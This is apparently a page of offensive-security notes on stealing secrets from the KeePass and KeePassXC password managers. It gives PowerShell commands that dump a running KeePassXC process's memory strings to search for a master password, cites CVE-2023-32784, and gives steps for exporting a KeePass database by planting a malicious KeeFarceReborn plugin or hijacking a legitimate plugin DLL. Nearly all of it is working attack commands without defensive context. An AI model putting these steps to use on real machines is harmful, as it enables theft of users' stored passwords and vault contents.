Comment on page
KeePass
PS > [System.Diagnostics.FileVersionInfo]::GetVersionInfo($(Get-Item "C:\Program Files\KeePassXC\KeePassXC.exe")).FileVersion
PS > .\strings2.exe -pid (Get-Process KeePassXC) -a -wide > keepassxc_strings.txt
PS > gc .\keepassxc_strings.txt | Select-String -Pattern Passw0
PS > (gc .\keepassxc_strings.txt).length
PS > (gc .\keepassxc_strings.txt).length / 1mb
CVE-2023-32784
Export DB by compiling and loading a malicious plugin (requires admin's privileges to place the
.plgx
file):Cmd > KeePass.exe --plgx-create C:\KeeFarceReborn\KeeFarceRebornPlugin
Cmd > copy C:\KeeFarceReborn\KeeFarceRebornPlugin.plgx "C:\Program Files\KeePass Password Safe 2\Plugins"
Export DB by hijacking a legit plugin DLL (requires an existent plugin in use):
Cmd > copy "C:\Program Files\KeePass Password Safe 2\KeePass.exe" .
Cmd > devenv /build Release KeeFarceRebornPlugin.sln
Cmd > copy C:\KeeFarceReborn\KeeFarceRebornPlugin\bin\Release\KeeFarceRebornPlugin.dll C:\Users\snovvcrash\AppData\Local\KeePass\PluginCache\3o7A46QKgc2z6Yz1JH88\LegitPlugin.dll
Last modified 5mo ago